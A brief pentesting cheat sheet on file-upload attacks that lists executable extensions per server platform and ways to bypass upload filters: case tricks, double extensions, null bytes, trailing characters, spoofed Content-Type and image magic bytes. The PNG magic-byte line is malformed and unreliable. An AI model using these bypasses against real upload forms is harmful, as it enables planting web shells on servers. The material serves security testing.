File Upload

Extensions

PHP

ASP

Jsp

Perl

ColdFusion

NodeJS

.php

.asp

.jsp

.pl

.cfm

.js

.php2

.config

.jspx

.pm

.cfml

.json

.php3

.ashx

.jsw

.cgi

.cfc

.node

.php4

.asmx

.jsv

.lib

.dbm

.php5

.aspq

.jspf

.php7

.axd

.wss

.pht

.cshtm

.do

.phpt

.cshtml

.action

.phtm

.rem

.phtml

.soap

.phps

.vbhtm

.phar

.vbhtm

.hphp

.asa

.module

.cer .shtml

.inc

.shtml

.ctp

Filter Bypass

Uppercase letters: .pHp, .pHP5, .PhAr
Double extension:
- .png.php
- .gif.php
Null byte:
- .php%00.gif
- .php\x00.gif
Special chars:
- file.php%20
- file.php%0a
- file.php%0d%0a
- file.php/
- file.php.\
- file.php....
Content-Type:
- Content-Type : image/gif
- Content-Type : image/png
- Content-Type : image/jpeg
Magic numbers:
- GIF: GIF8;
- PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
- JPG: \xff\xd8\xff

References

https://book.hacktricks.xyz/pentesting-web/file-upload

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

Last updated 11 months ago